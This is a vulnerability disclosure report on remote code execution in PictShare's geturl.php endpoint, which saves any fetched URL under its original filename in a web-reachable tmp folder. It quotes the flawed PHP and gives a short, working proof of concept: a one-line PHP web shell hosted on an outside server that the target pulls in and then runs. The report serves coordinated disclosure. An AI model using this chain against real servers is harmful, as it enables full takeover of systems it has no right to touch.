Code Injection in HaschekSolutions/pictshare

Valid
Reported on Jun 7th 2021

✍️ Description

Hi, there is a remote code execution vulnerability in pictshare in /api/geturl.php :

$url = trim($_REQUEST['url']);

if(!$url || !startsWith($url, 'http'))
    exit(json_encode(array('status'=>'err','reason'=>'Invalid URL')));
    
/**/

$name = basename($url);
$tmpfile = ROOT.DS.'tmp'.DS.$name;
file_put_contents($tmpfile,file_get_contents($url));//Write what where primitive !

The script will download the content of $url and place it into $tmpfile which is built using $name.

There is no check in the $url variable and no check in the $name variable.

If $url is equal to https://my_server.com/shell.php, then $name will be shell.php

And the file shell.php will be placed in the tmp folder inside the pictshare application. The shell will be accessible (and executed) by anyone

🕵️‍♂️ Proof of Concept

Set up a webserver, or set up a mock API server like beeceptor.

Serve a file named hello.phpwith this content : <?php echo system("id");?>

Visit your pictshare instance at http://192.168.169.103/pictshare/api/geturl.php?url=https://h0rez.free.beeceptor.com/hello.php

The server will download hello.php and place it in the tmp folder of pictshare

Then visit http://192.168.169.103/pictshare/tmp/hello.php

💥 Impact

Remote code execution, complete takeover of the server running this tool :)